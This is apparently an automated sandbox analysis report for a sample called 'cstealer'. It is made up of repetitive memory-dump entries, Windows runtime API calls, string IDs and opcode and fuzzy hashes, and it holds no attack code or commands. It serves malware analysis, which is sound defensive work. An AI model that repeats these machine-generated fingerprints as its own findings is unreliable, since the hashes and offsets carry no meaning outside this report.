                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: f4e2aff9ad020056e269964b82bac72321d6cb0e62f62776a5e1dae4aa9a1f90
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 4311A332A7EA1119FA741DECE44D37911816F78F74F789E38A96E063DECA24E8614A00
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC15F
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC17E
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC1A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC1B7
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC1C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 0edf6ad027cd4432b184a000666696f4467c11918a062e73d65072d1230534f5
                                                                                                                                                            • Instruction ID: dc4b722bc52709e1bc4aecd89f506977ac2d892b39b68c1d27883f250831bb96
                                                                                                                                                            • Opcode Fuzzy Hash: 0edf6ad027cd4432b184a000666696f4467c11918a062e73d65072d1230534f5
                                                                                                                                                            • Instruction Fuzzy Hash: A4116D60B1C61202FA79E325AA5117921D5DF44BF0F2847B5EC3ECA6C6DE2CBE11A700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 33c1781fd03adb740af2f2b373a1a36dcaefa8e0d61b13fcb7fb9143c19327a2
                                                                                                                                                            • Instruction ID: d9483017caa7d85085374a49a42960857f51b6414bd97ef920442b701cc62d03
                                                                                                                                                            • Opcode Fuzzy Hash: 33c1781fd03adb740af2f2b373a1a36dcaefa8e0d61b13fcb7fb9143c19327a2
                                                                                                                                                            • Instruction Fuzzy Hash: 3D112A10A0C21742F979E23599621B912D5CF45FB4F280BB5DD3ECE2D6DD2CBE026B10
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: Tuesday$Wednesday$or copy constructor iterator'
• API String ID: 3215553584-4202648911
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction ID: afd3c6251a8893efea480c8f7e57ff5e6f96bbe7386fbae317ce84eb0a2c0995
                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction Fuzzy Hash: A551B43271F6008EDBA8DF59E408B58B796FB58B9CF508A24DA1E83748E734D9508F04
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction ID: d5ce4a7f1e9637058529fd338cc1145042102bdc5604ae50e7a4d2a938fe939e
                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction Fuzzy Hash: 7831FF3221E740CEE764DF59E84C719B7A6FB48B88F148A14EE4E83784DB38C960CB04
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                            • Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                                                                                            • Instruction ID: bc4ccfc6182ad3c099d736b680732b6ea221787001fe8a5b67153d288a668f2c
                                                                                                                                                            • Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                                                                                            • Instruction Fuzzy Hash: AC31967262969281E630DB20E4416EAA3E4FF84FC4F804176E78D87A99DF3CDB05CB40
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00007FF6957E3FB9,?,00007FF6957E39CA), ref: 00007FF6957E43A8
                                                                                                                                                            • GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF6957E3FB9,?,00007FF6957E39CA), ref: 00007FF6957E43C8
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00007FF6957E3FB9,?,00007FF6957E39CA), ref: 00007FF6957E43D3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2226452419-4282027825
                                                                                                                                                            • Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                                                                                            • Instruction ID: f1d76e19a788cb8e198a95cd2a77ee028749d14a0d9dc928e760ea081c2af9f4
                                                                                                                                                            • Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                                                                                            • Instruction Fuzzy Hash: 1521B172B0865145E730DB21F9443EAA291EB89BD4F440232DF4D87AA4EF3CDA48CB00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                                                                                            • Instruction ID: 0cbebd5adc62fe0d1ae27a8ab59aebceb524552986dddbe7d0208d469a1c34e5
                                                                                                                                                            • Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                                                                                            • Instruction Fuzzy Hash: EBD1E072B08A8189E721CF79C4402EC37B6FB45BD8B144276DE5D9BB99DE38DA06D340
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction ID: 6c5554cca6a16e254e9b163669e04fbf882a3abb5ec5679f3e09f4265b8143ee
                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction Fuzzy Hash: BFD1F2B271AA808DE722CFA9D44439D37B1FF54798F104615CE5E97BD9DA38C426CB40
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3168794593-0
                                                                                                                                                            • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction ID: 3352ffe72e3efc369b5a0ca8369f20b4aacd0cfc086edd323988c492ac5d5037
                                                                                                                                                            • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction Fuzzy Hash: 39015272505F90CAD714DFEAE90814A77A0FF48F81F444825DB8E4376ADE38C061CB40
                                                                                                                                                            APIs
                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6957FDCFB), ref: 00007FF6957FDE2C
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6957FDCFB), ref: 00007FF6957FDEB7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                                                                                            • Instruction ID: 5543b8ad1d995437a94abdd32c3a8f0438c524375396cb0b126cfec7eb59ef7b
                                                                                                                                                            • Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                                                                                            • Instruction Fuzzy Hash: 0491D072E1865295F770DF6594406BD2BE0FB54F88F5441BADE0EABA84CF38D942E700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction ID: 6062b001dabd4ada579cf639902935512735a1641b87375113e7a8c770363219
                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction Fuzzy Hash: 7E91B4B271A6508DF7729FAD94483AE2BA0BF44B88F144919DE0E577D5DB3CC4A6CB00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                            • Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                                                                                            • Instruction ID: 6bb472fb638e9d663cf3fd8015bda81d6e1a85117fff029737a65d5f0fc4dd58
                                                                                                                                                            • Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                                                                                            • Instruction Fuzzy Hash: B6512B72F16621C6EB34CF359A416FC27E2EB40B58F900176ED2E926E5DF38E8418700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                            • Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                                                                                            • Instruction ID: e428592702259261ccd39b5ceae3f7aa9d8f079c552e149e4d0e8e58e7707030
                                                                                                                                                            • Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                                                                                            • Instruction Fuzzy Hash: DE515D22E186418AFB20DFB1E9503BD27F1EB48F58F108575DE0D8B68ADF38DA459741
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                                                                                            • Instruction ID: 90369e0c8914865a00980155058f42c6a2a1e2684b793bd2abc81fa57976f8a1
                                                                                                                                                            • Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                                                                                            • Instruction Fuzzy Hash: 9F111826B15B158AEB10CF70E9542B833A4FB19B58F441E31DA6D87BA4DF78E9548340
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
